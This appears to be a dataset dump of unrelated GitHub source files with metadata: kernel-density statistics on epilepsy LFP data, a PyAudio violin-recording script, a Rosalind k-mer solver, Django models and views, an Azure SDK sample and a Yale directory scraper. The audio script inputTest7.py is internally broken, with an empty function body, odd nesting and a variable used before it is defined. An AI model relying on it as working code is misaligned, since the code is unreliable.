if (math.fabs(u) <= 1):
K = (math.pi / 4) * math.cos(u * math.pi / 2)
else:
K = 0
sum += K
result = sum / (len(bio) * len(neuron) * h_bio)
return result
# function for computing the cross kernel term between the simulated and biological data
# with the bandwidth of the simulated data,
# used in the test statistic
def difference_bio_neuron_h_neuron(bio, neuron, h_neuron):
sum = 0
for elem in bio:
for el in neuron:
u = (elem - el) / h_neuron
if (math.fabs(u) <= 1):
K = (math.pi / 4) * math.cos(u * math.pi / 2)
else:
K = 0
sum += K
result = sum / (len(bio) * len(neuron) * h_neuron)
return result
# function for computing the test statistic for the given bandwidths
def statistics(bio, neuron, h_bio, h_neuron):
T = difference_bio(bio, h_bio) + difference_neuron(neuron, h_neuron) - difference_bio_neuron_h_bio(bio, neuron, h_bio) - difference_bio_neuron_h_neuron(bio, neuron, h_neuron)
return T
# function for computing the p_value for the given bandwidths
def p_value(bio, neuron, h_bio, h_neuron):
T = statistics(bio, neuron, h_bio, h_neuron)
f = lambda x: exp((-x ** 2)/2)
integral = scipy.integrate.quad(f, -inf, T)
result = 1/(math.sqrt(2*math.pi)) * integral[0]
return result
# Function for obtaining the pooled (flattened) data
def full(sim_data):
result = []
for elem in sim_data:
for el in elem:
result.append(el)
return result
# Function for building the array of points at which the density will be evaluated
def values_f(bio_test, sim_test):
min_v = min(min(bio_test), min(sim_test))
max_v = max(max(bio_test), max(sim_test))
    values = [] # build the array of points at which the density will be evaluated
    step = (max_v - min_v) / 3000 # the number depends on the sample size
for j in range(3001):
value = min_v + (step * j)
        values.append(value) # array of points for the bio density estimate
return values
# Function for filtering the data
def test_f(sim_data, filter):
sim_data_sort = sorted(sim_data, key=float)
sim_test = []
for elem in sim_data_sort:
        if elem > filter or elem < filter*(-1): # Filter the values
sim_test.append(elem)
return sim_test
# Load the simulated data
sim_data = []
f = open('/home/polina/диплом/эпилепсия_данные_sim/sim_data_prepare2', 'r')
elem = []
for line in f:
elem.append(float(line))
# take every 10th value, since the bio data are sampled per ms and the sim data per 0.1 ms
for i in range(15): # 0-600, 601-1201
    sim_data.append(elem[i*601+1 : (i*601)+601 : 10]) # got sim data split by sensor
print('sim length ', len(sim_data))
# load the bio data
mat = scipy.io.loadmat('/home/polina/диплом/эпилепсия_данные_био/2011 may 03 P32 BCX rust/2011_05_03_0023.mat', squeeze_me=True)
data = mat['lfp']
print(data.shape)
bio_data = []
for j in range(15):
result = []
for i in range(2000):
        result.append(data[i, j, 40]) # recording number
    bio_data.append(result)
print('bio length ', len(bio_data)) # got bio lfp split by sensor - 15 arrays of 2000 values
print()
fig = plt.figure(1) # first window with plots
#density_estim_bio_cos = [] # For per-sensor plotting
#density_estim_sim_cos = []
#density_estim_bio_cos_0_1 = []
#density_estim_sim_cos_0_1 = []
#density_estim_bio_cos_1 = []
#density_estim_sim_cos_1 = []
T_cos = []
T_cos_0_1 = []
T_cos_1 = []
p_cos = []
p_cos_0_1 = []
p_cos_1 = []
#values_array = []
#values_array_0_1 = []
#values_array_1 = []
h = [0.1, 0.1] # h_bio, h_sim
h_0_1 = [0.1, 0.2]
h_1 = [0.07, 0.15]
for i in range(0, 15): # 0,5 5,10 10,15
bio_test = normal(bio_data[i])
sim_test = normal(sim_data[i])
bio_test_0_1 = test_f(normal(bio_data[i]), 0.1)
sim_test_0_1 = test_f(normal(sim_data[i]), 0.1)
bio_test_1 = test_f(normal(bio_data[i]), 1)
sim_test_1 = test_f(normal(sim_data[i]), 1)
    # values = values_f(bio_test, sim_test) # For per-sensor plotting
# values_array.append(values)
# values_0_1 = values_f(bio_test_0_1, sim_test_0_1)
# values_array_0_1.append(values_0_1)
# values_1 = values_f(bio_test_1, sim_test_1)
# values_array_1.append(values_1)
# density_estim_bio_cos.append(density_estim(bio_test, h[0], values, 'cos'))
# density_estim_sim_cos.append(density_estim(sim_test, h[1], values, 'cos'))
# density_estim_bio_cos_0_1.append(density_estim(bio_test_0_1, h_0_1[0], values_0_1, 'cos')) # h[i-5][0], h[i-10][0]
# density_estim_sim_cos_0_1.append(density_estim(sim_test_0_1, h_0_1[1], values_0_1, 'cos'))
# density_estim_bio_cos_1.append(density_estim(bio_test_1, h_1[0], values_1, 'cos'))
# density_estim_sim_cos_1.append(density_estim(sim_test_1, h_1[1], values_1, 'cos'))
T_cos.append(statistics(bio_test, sim_test, h[0], h[1]))
T_cos_0_1.append(statistics(bio_test, sim_test, h_0_1[0], h_0_1[1]))
T_cos_1.append(statistics(bio_test, sim_test, h_1[0], h_1[1]))
p_cos.append(p_value(bio_test, sim_test, h[0], h[1]))
p_cos_0_1.append(p_value(bio_test_0_1, sim_test_0_1, h_0_1[0], h_0_1[1]))
p_cos_1.append(p_value(bio_test_1, sim_test_1, h_1[0], h_1[1]))
    print('Sensor ', i+1)
print('p-value ', p_cos, p_cos_0_1, p_cos_1)
bio_full = normal(full(bio_data))
sim_full = normal(full(sim_data))
bio_full_0_1 = test_f(normal(full(bio_data)), 0.1)
sim_full_0_1 = test_f(normal(full(sim_data)), 0.1)
bio_full_1 = test_f(normal(full(bio_data)), 1)
sim_full_1 = test_f(normal(full(sim_data)), 1)
values = values_f(bio_full, sim_full)
values_0_1 = values_f(bio_full_0_1, sim_full_0_1)
values_1 = values_f(bio_full_1, sim_full_1)
density_estim_bio_full = density_estim(bio_full, h[0], values, 'cos')
density_estim_sim_full = density_estim(sim_full, h[1], values, 'cos')
density_estim_bio_full_0_1 = density_estim(bio_full_0_1, h_0_1[0], values_0_1, 'cos')
density_estim_sim_full_0_1 = density_estim(sim_full_0_1, h_0_1[1], values_0_1, 'cos')
density_estim_bio_full_1 = density_estim(bio_full_1, h_1[0], values_1, 'cos')
density_estim_sim_full_1 = density_estim(sim_full_1, h_1[1], values_1, 'cos')
T_full = statistics(bio_full, sim_full, h[0], h[1])
T_full_0_1 = statistics(bio_full_0_1, sim_full_0_1, h_0_1[0], h_0_1[1])
T_full_1 = statistics(bio_full_1, sim_full_1, h_1[0], h_1[1])
p_full = p_value(bio_full, sim_full, h[0], h[1])
p_full_0_1 = p_value(bio_full_0_1, sim_full_0_1, h_0_1[0], h_0_1[1])
p_full_1 = p_value(bio_full_1, sim_full_1, h_1[0], h_1[1])
print('For the original normalized data')
for i in range(15):
print(T_cos[i])
print(p_cos[i])
print()
print('For the normalized data filtered to [-0.1; 0.1]')
for i in range(15):
print(T_cos_0_1[i])
print(p_cos_0_1[i])
print()
print('For the normalized data filtered to [-1; 1]')
for i in range(15):
print(T_cos_1[i])
print(p_cos_1[i])
print()
print('For the pooled normalized data')
print(T_full)
print(p_full)
print()
print('For the pooled normalized data filtered to [-0.1; 0.1]')
print(T_full_0_1)
print(p_full_0_1)
print()
print('For the pooled normalized data filtered to [-1; 1]')
print(T_full_1)
print(p_full_1)
plt.subplot(3, 1, 1)
plt.title('Simulation 2 / Experiment 23. Recording 40. Pooled normalized data, cosine kernel')
plt.plot(values, density_estim_bio_full, 'g', label='bio. h_bio = %.2f, h_sim = %.2f' % (h[0], h[1]), linewidth=0.8)
plt.plot(values, density_estim_sim_full, 'b', label='sim, p=%.5f' % p_full, linewidth=0.8)
plt.xticks([])
plt.legend(loc=2, fontsize=9)
plt.subplot(3, 1, 2)
plt.title('Pooled normalized data. Filtered to [-0.1; 0.1]') # pad=0
plt.plot(values_0_1, density_estim_bio_full_0_1, 'g', label='bio. h_bio = %.2f, h_sim = %.2f' % (h_0_1[0], h_0_1[1]), linewidth=0.8)
plt.plot(values_0_1, density_estim_sim_full_0_1, 'b', label='sim, p=%.5f' % p_full_0_1, linewidth=0.8)
plt.ylabel('Probability density value')
plt.xticks([]) # Hide the x axis
plt.legend(loc=2, fontsize=9)
plt.subplot(3, 1, 3)
plt.title('Pooled normalized data. Filtered to [-1; 1]')
plt.plot(values_1, density_estim_bio_full_1, 'g', label='bio. h_bio = %.2f, h_sim = %.2f' % (h_1[0], h_1[1]), linewidth=0.8)
plt.plot(values_1, density_estim_sim_full_1, 'b', label='sim, p=%.5f' % p_full_1, linewidth=0.8)
plt.xlabel('Local field potential, mV')
plt.legend(loc=2, fontsize=9)
plt.show()
|
[
"zyranovap@gmail.com"
] |
zyranovap@gmail.com
|
a9c949157556c29400086fe4868e2675154a03cb
|
00e25b8aa2e4ddd33cfd912f68625cab59588184
|
/inputTest7.py
|
631e98ea7e65b9a4d783f25e72d481b25a9d8287
|
[] |
no_license
|
jesenator/Violin-analysis-system
|
578fba2de31cde9890ae28bf7616ad575f11f2d6
|
19239e98dbb9e615aea5c9e369ce7e89d12c7d43
|
refs/heads/main
| 2023-07-18T09:18:47.980137
| 2021-08-31T17:22:59
| 2021-08-31T17:22:59
| 390,883,362
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,479
|
py
|
# inputTest6.1.py
# working on splitting channel input to two arrays - completed
################################################# functions
def getData(itr):
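    # Capture one hammer-triggered sample: buffer audio until the hammer channel crosses THRESHOLD,
    # record for RECORD_SECONDS while plotting the levels, then write per-channel WAV files.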
def writeFile(p, frames, channels, filename):
print("writing " + filename)
wf = wave.open(filename, 'wb')
wf.setnchannels(channels)
wf.setsampwidth(p.get_sample_size(FORMAT))
wf.setframerate(RATE)
wf.writeframes(b''.join(frames))
wf.close()
# print sound level and threshold to terminal
def printSound(rms, THRESHOLD):
bars = ""
scale_factor = 6
for i in range(int(rms/scale_factor)):
bars = bars + "|"
for i in range (rms/scale_factor, THRESHOLD/scale_factor):
bars = bars + " "
bars = bars + "-"
print(bars)
# define callback for pyaudio
def callback(data, frame_count, time_info, status):
frame = np.fromstring(data, dtype=np.int16)
hammerChannel = frame[HAMMERCHANNEL::CHANNELS]
micChannel = frame[MICCHANNEL::CHANNELS]
hammerData = hammerChannel.tostring()
micData = micChannel.tostring()
rms = audioop.rms(data, 2)
hammerRms = audioop.rms(hammerData, 2)
micRms = audioop.rms(micData,2)
if (recording != 2):
# printSound(rms, THRESHOLD)
hammerFramesDe.append(hammerData)
micFramesDe.append(micData)
framesDe.append(data)
rmsDe.append(rms)
hammerRmsDe.append(hammerRms)
micRmsDe.append(micRms)
diff = datetime.now() - startTime
seconds = diff.total_seconds()
xDe.append(round(seconds, 2))
# print(len(framesDe))
# while the sound threshold has not been surpassed, trim the buffers to a set length
if len(rmsDe) > RECORDING_FRAMES + BUFFER_FRAMES + 3:
rmsDe.popleft()
xDe.popleft()
hammerRmsDe.popleft()
micRmsDe.popleft()
if len(framesDe) > BUFFER_FRAMES and recording == 0:
framesDe.popleft()
hammerFramesDe.popleft()
micFramesDe.popleft()
# start recording if sound threshold is surpassed
if (hammerRms > THRESHOLD and recording == 0):
global time
time = datetime.now()
# recording = True
startRecording() # this is a hack of a solution because
# assigning the variable within the callback
# function caused issues.
print("*** recording")
# stop taking data from the audio stream and stop the plot
if recording == 1 and (datetime.now() - time > timedelta(seconds = RECORD_SECONDS)):
print("*** recording finished")
print("close plotter window")
endRecording()
animate(0)
ani.event_source.stop()
return (data, pyaudio.paContinue)
def animate(i):
ax.clear()
if recording == 0:
plt.title("listening")
elif recording == 1:
plt.title("recording")
elif recording == 2:
plt.title("recording finished - close plotter window")
plt.xlabel("time")
plt.ylabel("volume")
x = xDe
y = rmsDe
y2 = hammerRmsDe
y3 = micRmsDe
ax.set_ylim(0, Y_LIMIT)
ax1.set_ylim(0, Y_LIMIT)
ax2.set_ylim(0, Y_LIMIT)
ax3.set_ylim(0, Y_LIMIT)
# ax.plot(x, y)
ax1.plot(x, np.full(len(y), THRESHOLD), label="hammer threshold")
ax2.plot(x, y2, label="hammer")
ax3.plot(x, y3, label="mic")
ax2.legend()
def startRecording():
global recording
recording = 1
def endRecording():
global recording
recording = 2
def getSeconds():
milliseconds = int(datetime.strftime(datetime.now(), '%f'))
seconds = round(milliseconds/1000, 1)
# print(seconds)
print(milliseconds)
return seconds
def encode(line):
temp = base64.b64encode(bytes(line, encoding))
temp = temp.decode("Ascii") + "\n"
encoded = bytes(temp, encoding)
return encoded
def serialWrite(p, filename, frames):
ser.write(encode(filename))
if ".txt" in filename:
f = open(filename, "r")
for line in f:
encoded = encode(line)
decoded = base64.b64decode(encoded)
# print("sending: " + decoded.decode("Ascii"), end="")
ser.write(encoded)
elif ".wav" in filename:
for frame in frames:
ser.write(encode(frame))
ser.write(bytes("*\n", encoding))
def upload(p, HAMMER_OUTPUT_FILE, MIC_OUTPUT_FILE, hammerFrames, micFrames):
ser = serial.Serial(port='/dev/ttyUSB0',
baudrate=115200,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=1)
encoding = 'iso-8859-1'
serialWrite(p, HAMMER_OUTPUT_FILE, hammerFrames)
        serialWrite(p, MIC_OUTPUT_FILE, micFrames)
############################################ main
import sys
import pyaudio
import wave
import sys
import os
import struct
import numpy as np
import audioop
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from datetime import timedelta
from datetime import datetime
import time
import collections
import serial
print("running inputTest.py")
p = pyaudio.PyAudio()
# pyaudio stream characteristics
CHUNK = int(1024*4)
FORMAT = pyaudio.paInt16
DEVICE_INDEX= 2
CHANNELS = 2
RATE = 44100
RECORD_SECONDS = 1.5
RECORDING_BUFFER_SECONDS = .2
# THRESHOLD = 120
# Y_LIMIT = THRESHOLD * 5
THRESHOLD = 50
Y_LIMIT = 1500
# MIC_VISUAL_MULTIPLIER = 3
startTime = datetime.now()
# ouput file names
OUTPUT_FILE = "output.wav"
HAMMER_OUTPUT_FILE = "hammer_output" + str(itr) + ".wav"
MIC_OUTPUT_FILE = "mic_output" + str(itr) + ".wav"
# one channel is 0 and the other is 1.
MICCHANNEL = 1
HAMMERCHANNEL = 0
# this first measurment works when CHUNK 1024*3 but not for 1024*1
FRAMES_PER_SECOND = RATE / CHUNK
# FRAMES_PER_SECOND = 23
BUFFER_FRAMES = FRAMES_PER_SECOND * RECORDING_BUFFER_SECONDS
RECORDING_FRAMES = FRAMES_PER_SECOND * RECORD_SECONDS
print("Input info: ", p.get_default_input_device_info())
stream = p.open(format = FORMAT,
channels = CHANNELS,
rate = RATE,
input_device_index = DEVICE_INDEX,
input = True,
frames_per_buffer = CHUNK,
stream_callback = callback)
frames, hammerFrames, MicFrames, x, y, = [], [], [], [], []
cutoffLine = []
global recording
recording = 0
framesDe = collections.deque()
hammerFramesDe = collections.deque()
micFramesDe = collections.deque()
rmsDe = collections.deque()
hammerRmsDe = collections.deque()
micRmsDe = collections.deque()
xDe = collections.deque()
print("starting stream")
stream.start_stream()
fig = plt.figure()
ax = plt.subplot()
ax1 = plt.subplot()
ax2 = plt.subplot()
ax3 = plt.subplot()
ani = animation.FuncAnimation(fig, animate, interval=25)
plt.show()
stream.stop_stream()
stream.close()
p.terminate()
frames = framesDe
hammerFrames = hammerFramesDe
micFrames = micFramesDe
# writeFile(p, frames, 1, OUTPUT_FILE)
writeFile(p, hammerFrames, 1, HAMMER_OUTPUT_FILE)
writeFile(p, micFrames, 1, MIC_OUTPUT_FILE)
# upload(p, HAMMER_OUTPUT_FILE, MIC_OUTPUT_FILE, hammerFrames, micFrames)
# os.system("aplay " + OUTPUT_FILE)
# os.system("aplay " + HAMMER_OUTPUT_FILE)
# os.system("aplay " + MIC_OUTPUT_FILE)
# Remove leftover output files from previous runs; os.remove does not expand wildcards.
import glob
for leftover in glob.glob("*_output*.wav"):
    try:
        os.remove(leftover)
    except OSError:
        pass
POINTS = 4
for itr in range(POINTS):
print("data point " + str(itr))
getData(itr)
|
[
"noreply@github.com"
] |
jesenator.noreply@github.com
|
d7d684df0cf1d3b5514343eb7f53a9abe2d06a2d
|
57e10f6657a9c0ef8ec9659a29f0b467699bbfcf
|
/Chapter 2/BA2C.py
|
fb8476f95eb870196583a66c89a94649a075484e
|
[] |
no_license
|
ShehabAhmedSayem/rosalind
|
b1dcc2c3fbb211d2b7fe5041be3b653b6270ac80
|
699f6ea6a4176f7edec02137446141b131ab737f
|
refs/heads/master
| 2020-04-02T17:55:32.928186
| 2016-03-03T09:38:28
| 2016-03-03T09:38:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,241
|
py
|
""" Find a Profile-most Probable k-mer in a String """
profile_row = {'A': 0, 'C':1, 'G':2, 'T':3}
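# profile_row maps each nucleotide to its row index in the profile matrix (rows A, C, G, T).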
def read_profile_matrix(fileName):
with open(fileName) as f:
lines = f.readlines()
for i in xrange(0, len(lines)):
lines[i] = lines[i].strip()
data = list(list())
for i in xrange(0, len(lines)):
data.append(lines[i].split())
for i in xrange(0, len(data)):
for j in xrange(0, len(data[i])):
data[i][j] = float(data[i][j])
return data
def pattern_probability(profile, pattern):
probability = 1
for i in xrange(0, len(pattern)):
probability *= profile[profile_row[pattern[i]]][i]
return probability
def profile_most_probable_kmer(dna, profile, k):
start = 0
length = len(dna)
max_probability = 0
most_probable = ''
while start + k <= length:
substr = dna[start:start+k]
probability = pattern_probability(profile, substr)
if probability > max_probability:
most_probable = substr
max_probability = probability
start += 1
print most_probable
if __name__ == "__main__":
data = read_profile_matrix("in.txt")
profile_most_probable_kmer("TGACCTGGATAACAG", data, 6)
|
[
"andrey.rozumnuy@gmail.com"
] |
andrey.rozumnuy@gmail.com
|
b53a79653da1f30b4346d7cee4b0c1ab43348665
|
74167e4c1061b454d1ab1c2140a1fc2f4540ee2e
|
/accounts/models.py
|
fc5a140def7581969baf9c6413966fd5a150517c
|
[] |
no_license
|
Pagante/ProjectCart
|
f72a1a611445f66c1320c0c21e1832d3ecf67a2a
|
4f065a02a8235c6744768328af5c1e103321ed44
|
refs/heads/main
| 2023-06-05T23:53:10.316222
| 2021-06-27T21:47:28
| 2021-06-27T21:47:28
| 380,840,906
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,861
|
py
|
from django.db import models
from django.contrib.auth.models import BaseUserManager,AbstractBaseUser
# Create your models here.
class MyAccountManager(BaseUserManager):
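    # Custom manager for the e-mail-based Account model below; builds regular users and superusers.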
def create_user(self, first_name, last_name, username, email, password=None):
        if not email:
raise ValueError('User must have an email')
if not username:
raise ValueError('User must have a username')
user = self.model(
email = self.normalize_email(email),
username = username,
first_name = first_name,
last_name = last_name
)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, first_name, last_name, username, email, password):
user = self.create_user (
email = self.normalize_email(email),
username = username,
password= password,
first_name= first_name,
last_name= last_name,
)
user.is_admin = True
user.is_active = True
user.is_staff = True
user.is_superadmin = True
user.save(using= self._db)
return user
class Account(AbstractBaseUser):
first_name = models.CharField(max_length=50)
last_name = models.CharField(max_length=50)
username = models.CharField(max_length=100, unique=True)
    email = models.CharField(max_length=100, unique=True)
phone_number = models.CharField(max_length=50)
# required Field
date_joined = models.DateTimeField(auto_now_add=True)
last_login = models.DateTimeField(auto_now_add=True)
is_admin = models.BooleanField(default=False)
is_staff = models.BooleanField(default=False)
is_active = models.BooleanField(default=False)
is_superadmin = models.BooleanField(default=False)
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['username', 'first_name', 'last_name']
objects = MyAccountManager()
def fullName(self):
return f"{self.first_name} {self.last_name}"
def __str__(self):
return self.email
def has_perm(self, perm, obj=None):
return self.is_admin
def has_module_perms(self, obj_module):
return True
class UserProfile(models.Model):
user = models.OneToOneField(Account, on_delete=models.CASCADE)
address_line_1 = models.CharField(blank=True, max_length=100)
address_line_2 = models.CharField(blank=True, max_length=100)
profile_picture = models.ImageField(upload_to='userprofile', blank=True)
city = models.CharField(blank=True, max_length=50)
state = models.CharField(blank=True, max_length=50)
country = models.CharField(blank=True, max_length=50)
def __str__(self):
return self.user.first_name
def fullAddress(self):
return f'{self.address_line_1} {self.address_line_2}'
|
[
"55301195+Pagante@users.noreply.github.com"
] |
55301195+Pagante@users.noreply.github.com
|
fb58a27373295fd23e4e441d7160e90f57d8c58a
|
9df2fb0bc59ab44f026b0a2f5ef50c72b2fb2ceb
|
/sdk/paloaltonetworks/azure-mgmt-paloaltonetworksngfw/generated_samples/local_rulestacks_create_or_update_minimum_set_gen.py
|
eb4b8b0451f4477d85ec725f4dfa1603454d7a23
|
[
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
openapi-env-test/azure-sdk-for-python
|
b334a2b65eeabcf9b7673879a621abb9be43b0f6
|
f61090e96094cfd4f43650be1a53425736bd8985
|
refs/heads/main
| 2023-08-30T14:22:14.300080
| 2023-06-08T02:53:04
| 2023-06-08T02:53:04
| 222,384,897
| 1
| 0
|
MIT
| 2023-09-08T08:38:48
| 2019-11-18T07:09:24
|
Python
|
UTF-8
|
Python
| false
| false
| 1,765
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.paloaltonetworksngfw import PaloAltoNetworksNgfwMgmtClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-paloaltonetworksngfw
# USAGE
python local_rulestacks_create_or_update_minimum_set_gen.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
client = PaloAltoNetworksNgfwMgmtClient(
credential=DefaultAzureCredential(),
subscription_id="2bf4a339-294d-4c25-b0b2-ef649e9f5c27",
)
response = client.local_rulestacks.begin_create_or_update(
resource_group_name="rgopenapi",
local_rulestack_name="lrs1",
resource={"location": "eastus", "properties": {}},
).result()
print(response)
# x-ms-original-file: specification/paloaltonetworks/resource-manager/PaloAltoNetworks.Cloudngfw/preview/2022-08-29-preview/examples/LocalRulestacks_CreateOrUpdate_MinimumSet_Gen.json
if __name__ == "__main__":
main()
|
[
"noreply@github.com"
] |
openapi-env-test.noreply@github.com
|
ff0c123b0c7ae8870e5b364be189684c9146de72
|
2da2378855044f3f23f28d67224f0a331ff8ae33
|
/blog/migrations/0005_blog_read_num.py
|
6043f388dfe620be85db31b6eba3221dbef02e2c
|
[] |
no_license
|
Golorcsh/mysite
|
ce6470e34efc749bddf5e371a5b3c7091a507a82
|
5ebbb42d212a8b1cad2cbf3919320b13db66a1d0
|
refs/heads/master
| 2020-05-15T17:40:32.029792
| 2019-05-28T03:09:19
| 2019-05-28T03:09:19
| 182,408,490
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 378
|
py
|
# Generated by Django 2.2 on 2019-04-22 11:16
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0004_auto_20190422_0858'),
]
operations = [
migrations.AddField(
model_name='blog',
name='read_num',
field=models.IntegerField(default=0),
),
]
|
[
"c1045132383@gmail.com"
] |
c1045132383@gmail.com
|
d32afc57ea4aa43077280476b3f715c5706dbaaf
|
73455df4c6185d9c4dc9f1a94c748e4f7ca590d0
|
/fruit/event/event.py
|
97dd069ed3622bee73b05dfd46073e3e07c6101a
|
[
"MIT"
] |
permissive
|
felko/fruit
|
ad54f629af3e41b35371fcda6bd4839b68275535
|
4768fd333ac3b7c0bd6d339304b23e20e312d2d1
|
refs/heads/master
| 2020-12-28T19:24:17.192104
| 2016-05-22T10:38:48
| 2016-05-22T10:38:48
| 59,365,452
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 667
|
py
|
#!/usr/bin/env python3.4
# coding: utf-8
class Event:
"""
Base class of all events.
"""
@classmethod
def from_pygame_event(cls, event):
"""
Interpret a pygame event as a Fruit event.
"""
@staticmethod
def get_event_queue(raw_event):
"""
Return the event queue from a single pygame event.
"""
return _convert_event(Event, raw_event)
def _convert_event(cls, raw_event):
"""
Converts an event from a pygame event to a Fruit event.
"""
if raw_event is not None:
for subcls in cls.__subclasses__():
event = subcls.from_pygame_event(raw_event)
if event is not None:
yield event
yield from _convert_event(subcls, raw_event)
|
[
"skolopedrion@gmail.com"
] |
skolopedrion@gmail.com
|
68107dada2e7dd7dc4eabd477e86ea95d7540946
|
e719bcfde03c0be2c84a7f1e13d12b80fa00ea84
|
/session2/draw_2.py
|
0780ebd4934bca50609387bc0e008130c608d56c
|
[] |
no_license
|
minhduc9699/phamMinhDuc-D4E17
|
53b80e53ff175f0357fb01c9876aa12b343ca060
|
363b61745a206f33c5cfa3532a5abd920fcf4ad1
|
refs/heads/master
| 2023-01-22T08:25:14.210959
| 2020-12-05T04:53:38
| 2020-12-05T04:53:38
| 308,668,542
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 154
|
py
|
from turtle import *
speed(-1)
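# Draw regular polygons with 3 through 10 sides, one after another.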
for edge in range(3, 11):
print(edge)
for i in range(edge):
forward(100)
left(360/edge)
mainloop()
|
[
"minhduc.096.99@gmail.com"
] |
minhduc.096.99@gmail.com
|
efdf49596ac6fb21b807699b0abb2a4f1d012812
|
b41adb2016aa2b290df52157ed1ac39d43f747f2
|
/yalescript.py
|
c18b0fe2a0697e89b0083583ae776090fc3386e4
|
[] |
no_license
|
joannaw516/490
|
cdadbde0b459e2abce6e43bce77af83bb8e7ea63
|
05f3f74016f09b7d603b1fcfa720445c358b8665
|
refs/heads/master
| 2022-05-20T17:44:38.760050
| 2020-04-28T04:35:35
| 2020-04-28T04:35:35
| 256,064,062
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,280
|
py
|
import pandas as pd
import requests
from bs4 import BeautifulSoup
#import pandas for exporting to csv, requests for fetching html, beautifulsoup for parsing html
#using requests to get html from url, and beautiful soup to parse html content
page = requests.get('https://yalecollege.yale.edu/academics/directory-duses-assistants-and-registrars')
soup = BeautifulSoup(page.content, 'html.parser')
#finding main content by id to have access
table = soup.find(id= 'block-yale-college-content')
#find all main headers, the departments
names = table.find_all('h2')
#remove white space from both ends of text
cleannames= [item.get_text() for item in names]
#print(school_list)
#find all email addresses / links
emails = table.find_all('a')
#find all directors and registrars names
text = table.find_all('p')
codirectorsanddirectors = []
emaillist = []
# for x in range(20,220):
# entry = emails[x].get('href')
# if entry == None:
# continue
# if
# print(entry)
#this part was a little janky, there was a lot of variance in the directors-
#some departments had co-directors, some had 1 DUS, some had 2, some had one for the fall and one for the spring
for x in range(2, 202):
entry = text[x].get_text()
#print(entry, x)
#remove empty strings
if entry == '':
continue
if entry[0] == ('D') or entry[0] == ('C'):
#this part was also very janky, i indexed into the emails offset by the few links for the letters at the top of the page
emailaddress= emails[x+18].get('href')
emaillist.append(emailaddress[7:])
#print(entry)
codirectorsanddirectors.append(entry)
#print("codirectorsanddirectors:", codirectorsanddirectors)
#print(text[50].get_text())
#get the text for all of the DUS names
names= [item.get_text() for item in names]
#for x in range(27, 50)
#print(DUSnames)
#exported the emails and names separately from the departments
full_list = pd.DataFrame(
{'DUS': codirectorsanddirectors,
'emails': emaillist
})
departments = pd.DataFrame(
{'departments': names
})
#export to CSV
full_list.to_csv('dus.csv')
departments.to_csv('departments.csv')
#print(emails[27])
#next steps for researching this would likely be to check out ways to web scrape that don't use find_all and scrape a page in chronological order
|
[
"joanna.j.wu@yale.edu"
] |
joanna.j.wu@yale.edu
|
f0757cf64760f87471f7aff2b9859a711f29b54a
|
33d0cafd100b805b34450b9ca4b90015ca3ede50
|
/textutils/textutils/views.py
|
616b2077e84f7650c288b4999620915714ed0ea1
|
[] |
no_license
|
coder-KB/TextUtil
|
4fdcb47c5429dd6abe57e32735cf990269bfae15
|
44aa1bf21bca5ce8d1a05d6767d198d0ed173f4f
|
refs/heads/master
| 2020-09-07T18:12:16.250426
| 2019-11-11T00:57:26
| 2019-11-11T00:57:26
| 220,873,411
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,139
|
py
|
from django.http import HttpResponse
from django.shortcuts import render
def index(request):
return render(request, 'index.html')
def analyze(request):
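    # Read the submitted text and apply each selected transformation in sequence, rendering the last result.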
# Get the text
djtext = request.POST.get('text', 'default')
# Check checkbox values
removepunc = request.POST.get('removepunc', 'off')
fullcaps = request.POST.get('fullcaps', 'off')
newlineremover = request.POST.get('newlineremover', 'off')
extraspaceremover = request.POST.get('extraspaceremover', 'off')
charcount = request.POST.get('charcount', 'off')
#Check which checkbox is on
if(removepunc == "on"):
punctuations = '''!()-[]{};:'"\,<>./?@#$%^&*_~'''
analyzed = ""
for char in djtext:
if char not in punctuations:
analyzed = analyzed + char
params = {'purpose':'Removed Punctuations', 'analyzed_text': analyzed}
djtext = analyzed
if(fullcaps=="on"):
analyzed = ""
for char in djtext:
analyzed = analyzed + char.upper()
params = {'purpose': 'Changed to Uppercase', 'analyzed_text': analyzed}
djtext = analyzed
if(extraspaceremover=="on"):
analyzed = ""
for index, char in enumerate(djtext):
            if not (char == " " and index + 1 < len(djtext) and djtext[index + 1] == " "):
analyzed = analyzed + char
        params = {'purpose': 'Removed Extra Spaces', 'analyzed_text': analyzed}
djtext = analyzed
if(newlineremover == "on"):
analyzed = ""
for char in djtext:
if char != "\n" and char != '\r':
analyzed = analyzed + char
params = {'purpose': 'Removed NewLines', 'analyzed_text': analyzed}
djtext = analyzed
if(charcount == 'on'):
cnt = len(djtext)
analyzed = f"Total number of characters are {cnt}."
        params = {'purpose': 'Counted Characters', 'analyzed_text': analyzed}
if(removepunc != "on" and fullcaps != "on" and extraspaceremover != "on" and
newlineremover != "on" and charcount != "on"):
return HttpResponse("Error")
return render(request, 'analyze.html', params)
|
[
"noreply@github.com"
] |
coder-KB.noreply@github.com
|
cd46193f2107a70f24bf853229b251e11f09edd3
|
5989e503a733e8b29f4c502008446a75c2b43ff8
